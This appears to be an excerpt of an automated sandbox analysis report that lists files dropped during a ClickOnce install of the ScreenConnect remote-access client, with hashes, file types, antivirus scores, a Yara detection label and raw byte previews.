                                                                                                                                                                              SSDEEP:192:XVh4+Qgk9qH6FySAU8s8o5yjEadngN8s8oTN2x2QPIlFDLhEDh7BqWoDOM:XVe9qH6UZUX95QEBX9R/QPIBM7YDT
                                                                                                                                                                              MD5:1E8131C9149A39CB86CA3D5905B573CC
                                                                                                                                                                              SHA1:8C9B0718846063CAA2B9EAE502B21595A747D848
                                                                                                                                                                              SHA-256:697D83C25828A7C1B7CC1BB3FDD6B9EABD14888A4A750B05EC0B08BA5908B4ED
                                                                                                                                                                              SHA-512:1B9F84381899FFF1372E6BCBFAF2DFB9A568D746F6965390B633F6DD0FDC0E277C2D5C463E5BCA72F1CD4DBE878875E43F00FD207FA2734EF2B9124613D458BC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:PcmH........ c....+$...@.......T...............8...........#........<.g..J.|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$..........Y.p.:............8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......@8......H8......P8......p8......t8..L...|8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%.W.."(.v......o....T..."............-........................E......................................4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%23.9.10.8817........................

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28.manifest

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):144124
                                                                                                                                                                              Entropy (8bit):5.694726688017173
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:F/0/BZSGr3qk54q8sYV7WfUIRTLTyErpErpXm2o9HuzhJOvP:F8BCk5GVW/RWErpErpXmt8vOvP
                                                                                                                                                                              MD5:15C0340778DF443695BEC662F9D21534
                                                                                                                                                                              SHA1:D08FF59760BF40564E38F7256D7172565EF2B4D5
                                                                                                                                                                              SHA-256:7D3A856309950D41FDF338919E115830115F9D56E3A2B9D0EED37E90315D2C80
                                                                                                                                                                              SHA-512:F273BB1BCA5A8F505488405C1F7059DE4E5509B390AF3E7DA465911BCAE7D10884349C6AD09723752490CB329E0ACB63603F69E781F1F348191F1AF6F657F910
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="23.9.10.8817" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924.cdf-ms

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4428
                                                                                                                                                                              Entropy (8bit):4.371558920082183
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:f2ZNeV+Ww8z45uECG6Np+SygKfwn6GDVf:BJUuEX6pdqo6G
                                                                                                                                                                              MD5:248E3EB2EC30896517E7875A66E77C24
                                                                                                                                                                              SHA1:028ACF87912CD3226738EF37A0F430000D3F463B
                                                                                                                                                                              SHA-256:3DD7E5E8385AF9F65B2054F5255C72FDF18897EDD704FFAB0D565BC8CD0A2B7A
                                                                                                                                                                              SHA-512:8D53D953585A859202376FE8F0A3C000CB5A8EEFC1E12F14D27A05FF5360223FA938A200596F5A5C0C823A55DCAF033C50493C68027DF409BB429BF72A41A655
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:PcmH..........E'.dd.,...T.......T...............8...........+........<.g..J.|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$..........Y.p.:..........6...................z..w.....[~31.X......E..X.....s".I...R....y..&..d......B(.........O.&r..Vz!...[s.T..<$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......|...........(...............................(................... ...(...8.......`.......h...(...|...................(...............L...........0...................................................................................................................................................................................................................................................................................................nameScreenConnect.Cl

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\manifests\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924.manifest

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1636
                                                                                                                                                                              Entropy (8bit):5.0848956029560135
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRzgeP0A2+vSkcyMQcbEMQcuMQcVSkcf5bdTo:3FYZ8h9o9gI0A2CHMQTMQ3MQGAXTo
                                                                                                                                                                              MD5:F94D041A8128BE81C4347CAF6A3C47BF
                                                                                                                                                                              SHA1:3285F9ACF70C0E4D34F888C28BD3F693E3DF5909
                                                                                                                                                                              SHA-256:91A65BACAD5F7F70BDDC6209ED65DD5C375CEF9F3C289EAB83FD90D622ADF46B
                                                                                                                                                                              SHA-512:90199543207CAF9B4501BE7E9509DC9526DAFCD5602AAED700314763021C8F3ED06D93A31A90A34CB19D4FB7184AA7D154B197F9E535657AEB9EB872DA377A41
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="23.9.10.8817" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.ClientService.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):95520
                                                                                                                                                                              Entropy (8bit):6.505299402844754
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:0g1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkg4T0HMc7Jxc:NhbNDxZGXfdHrX7rAc6myJkg4T0H/A
                                                                                                                                                                              MD5:DC615E9D8EC81CBF2E2452516373E5A0
                                                                                                                                                                              SHA1:EC83D37A4F45CAEB07B1605324D0315F959452E9
                                                                                                                                                                              SHA-256:E9AB064ED381C29A3930F75CA3E05605C6EE07F30A69C043F576A5461DE3BAFC
                                                                                                                                                                              SHA-512:82FE00447FB9785264DFB8032399ADF6D33D91D71058212D252742C9E5FD54F5A52F6BAF4FB05E95F9A4055057C60A33A7C1C642F18A6A4E045B49BE88FA5D9F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@..................................t....@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):61216
                                                                                                                                                                              Entropy (8bit):6.318400837211405
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:0Ai+pmi/djqbv8DtYQ4RE+TC3l/ibU37DIx4:0Upmi1YQb1l3X
                                                                                                                                                                              MD5:10DBA57F22A6AB4039330000570F39F8
                                                                                                                                                                              SHA1:B8B5C65A89256177DA802C4C9CBD11B013221730
                                                                                                                                                                              SHA-256:9BD8D15759F83D99EDD1F2617D59A94E1C2BB4BD7C4977958F5D5F22C5A7C469
                                                                                                                                                                              SHA-512:38230B63A4630145608F619D75CA3115C05AB0338FB57566E012DF1BD157123A670A37AE0FEA92351AB7352319A5AF29F9DB3F8BB14962F3F0DE3A4F5A5B754C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...."............"...0.............6.... ........@.. ....................... ............@.....................................O.......,............... )..........(...8............................................ ............... ..H............text...<.... ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S...............................................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s ...(!...s....("...*..0...........(#.....($.....(%....s....%.o&...%.o'...%.o(...%s!...o)...%~....o*...}......(....o+...o,....(-.....@...%..(.....o.....s/...}.....{...........s0...o1....s...

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsClient.exe.config

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsFileManager.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):81696
                                                                                                                                                                              Entropy (8bit):5.850192336318162
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:GxIh+Sflv4V/bBI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7xk7NxGC:Em9CukLdtkL
                                                                                                                                                                              MD5:C333D3A6EEB74E4D76C3B9E0F6BFD04C
                                                                                                                                                                              SHA1:A39E2643E8DBD2097829E0B08938726557CB8E36
                                                                                                                                                                              SHA-256:998D7A0CD6B1A837489E55E99CB992088B9FDE220A1025346A461849E1F50D22
                                                                                                                                                                              SHA-512:58CC7741EBE1AADA93FD82A3E0A571A9A1AA3E400C46E7CDDDEF876D74F4FBBCBAE4293AC556B3823E8DC977E7CE72337A16C2D48EAB0AA52B736412AE43C634
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..@..........B^... ...`....@.. .......................`.......<....@..................................]..O....`.. ............... )...@......<]..8............................................ ............... ..H............text...H>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B................#^......H........*...1...................\........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}C....s....}B...~@...%-.&~?.....<...s ...%.@.......?...s ........@...s!...}D......A...s"..........(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t..........o$.......o%.......

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\ScreenConnect.Core.dll

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):531456
                                                                                                                                                                              Entropy (8bit):6.031735419537473
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:ZPpB0+E5A976t5puf9NTh/k4dKRYJUYg7N+earZ5Ghfn55AJ6m/JaXAQKx4kEYYo:dpq+Ezuf9N0RYJZPUI6
                                                                                                                                                                              MD5:B319407E807BE1A49E366F7F8EA7EE2A
                                                                                                                                                                              SHA1:B12197A877FB7E33B1CB5BA11B0DA5CA706581BA
                                                                                                                                                                              SHA-256:761B7E50BAA229E8AFCD9A50990D7F776DDB5ED1EA5FBB131C802E57CF918742
                                                                                                                                                                              SHA-512:DC497643790DC608DECE9C8FE7264EFEDD13724BD24C9BF28A60D848B405FDDEFB8337A60F3F32BB91518910E02C7A2AAF29FC32F86A464DFCAFA365526BDB7F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0............../... ...@....... ...............................8....@.................................1/..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................e/......H........2..(.............................................................{9...*..{:...*V.(;.....}9.....}:...*...0..A........ur.......4.,/(<....{9....{9...o=...,.(>....{:....{:...o?...*.*.*. ... )UU.Z(<....{9...o@...X )UU.Z(>....{:...oA...X*...0..b........r...p......%..{9......%qu....u...-.&.+...u...oB....%..{:......%qv....v...-.&.+...v...oB....(C...*..{D...*..{E...*V.(;.....}D.....}E...*.0..A........uw.......4.,/(<....{D....{D...o=...,.(>....{E....{E...o?...*.*.*. F.b# )UU.

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\ScreenConnect.Windows.dll

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1716224
                                                                                                                                                                              Entropy (8bit):6.635479721420864
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:ZSjm7Fj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUw:Sm7JkGYYpT0+TFiH7efP
                                                                                                                                                                              MD5:29454A0CB83F28C24805E9A70E53444A
                                                                                                                                                                              SHA1:334202965B07AB69F08B16FED0EE6C7274463556
                                                                                                                                                                              SHA-256:998CC3F9AF5BD41CCF0F9BE86192BBE20CDEC08A6FF73C1199E1364195A83E14
                                                                                                                                                                              SHA-512:62790920974A2F1B018D466AE3E3B5100006A3C8013F43BDB04AF7074CFE5D992CAAEB610DE2B1B72FF0E4ACF8762DB1513A4A0CF331F9A340AE0CE53C3BE895
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L............" ..0..(...........F... ...`....... ..............................lc....@..................................E..O....`.............................. E..8............................................ ............... ..H............text...(&... ...(.................. ..`.rsrc........`.......*..............@..@.reloc..............................@..B.................E......H.......$...L...........p...0....D........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*f.{......(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L.......

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):587040
                                                                                                                                                                              Entropy (8bit):6.166636022526366
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:npu96mzdjnwbrYQySjbs03fG+Yg2PgG7x:CpjpSjq77x
                                                                                                                                                                              MD5:5DEC65C4047DE914C78816B8663E3602
                                                                                                                                                                              SHA1:8807695EE8345E37EFEC43CBC0874277ED9B0A66
                                                                                                                                                                              SHA-256:71602F6B0B27C8B7D8AD624248E6126970939EFFDE785EC913ACE19052E9960E
                                                                                                                                                                              SHA-512:27B5DCB5B0AEADF246B91A173D06E5E8D6CF2CD19D86CA358E0A85B84CD9D8F2B26372EF34C3D427F57803D90F2E97CF59692C80C268A71865F08FC0E7CE42D1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...twP..........."...0.................. ........@.. .......................@.......a....@.....................................O....................... )... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........7......................`.........................................{F...*..{G...*V.(H.....}F.....}G...*...0..A........u,.......4.,/(I....{F....{F...oJ...,.(K....{G....{G...oL...*.*.*. }.o )UU.Z(I....{F...oM...X )UU.Z(K....{G...oN...X*...0..b........r...p......%..{F......%q/..../...-.&.+.../...oO....%..{G......%q0....0...-.&.+...0...oO....(P...*..{Q...*..{R...*V.(H.....}Q.....}R...*.0..A........u1.......4.,/(I....{Q....{Q...oJ...,.(K....{R....{R...oL...*.*.*. 1.c. )UU.

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe:Zone.Identifier

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:gAWY3n:qY3n
                                                                                                                                                                              MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                                                                                              SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                                                                                              SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                                                                                              SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:[ZoneTransfer]..ZoneId=3..

                                                                                                                                                                              C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\ScreenConnect.Client.dll

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):192512
                                                                                                                                                                              Entropy (8bit):6.5759745825926155
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:NfVfH24qg0+UkqVk9kkkkkkHEkkkNikkAkkkkkkkkpkkAkKMi7stGzHqcyzdWFDm:H+a0+UkqVk9kkkkkkHEkkkNikkAkkkku
                                                                                                                                                                              MD5:6BC9611D5B6CEE698149A18D986547A8
                                                                                                                                                                              SHA1:F36AB74E4E502FDAF81E101836B94C91D80CB8EA
                                                                                                                                                                              SHA-256:17377A52EEAE11E8EE01EB629D6A60C10015AD2BB8BC9768E5C8E4B6500A15ED
                                                                                                                                                                              SHA-512:3F23670D0BA150DE19A805DB6BEB6EED8538BBAD6FBE3CC21D17D738A43CF411C679A23CEA11549E69BE0321E672F740791D40E92498AEF9D1F8650743EE85EA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
